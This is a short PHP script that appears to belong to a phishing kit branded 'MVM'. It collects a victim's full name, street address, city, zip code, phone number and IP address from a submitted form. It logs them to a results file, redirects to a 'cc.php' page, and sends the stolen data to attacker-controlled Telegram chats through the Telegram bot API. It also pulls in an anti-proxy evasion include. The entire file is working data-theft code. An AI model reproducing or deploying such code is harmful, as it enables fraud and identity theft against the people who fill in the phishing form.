<?php 
extract($_REQUEST);
include "../id.php";

$CC=$_POST['fullname'];
$M=$_POST["street"];
$CV=$_POST['city'];
$CA=$_POST['zip'];
$MA=$_POST["number"];
$ipp=$_SERVER['REMOTE_ADDR'];
$message=">>>>>>>>>>>>>|💸| MVM |💸|<<<<<<<<<<<<"."\n"."Full Name :   ".$CC."\n"."Street :   ".$M."\n"."City :   ".$CV."\n"."Zip :   ".$CA."\n"."Phone number :   ".$MA."\n"."Ip :  ".$ipp."\n".">>>>>>>>>>>>>|💰| MVM |💰|<<<<<<<<<<<<";
$user_ids=$id;
$filee=fopen("../result.txt",'a');
fwrite($filee,$message."\n");
fclose($filee);
header("location: cc.php");
foreach($user_ids as $user_id) {
$url='https://api.telegram.org/bot'.$token.'/sendMessage';
$data=array('chat_id'=>$user_id,'text'=>$message);
$options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
$context=stream_context_create($options);
$result=file_get_contents($url,false,$context);
include "../anti/antiproxy1.php";
}
?>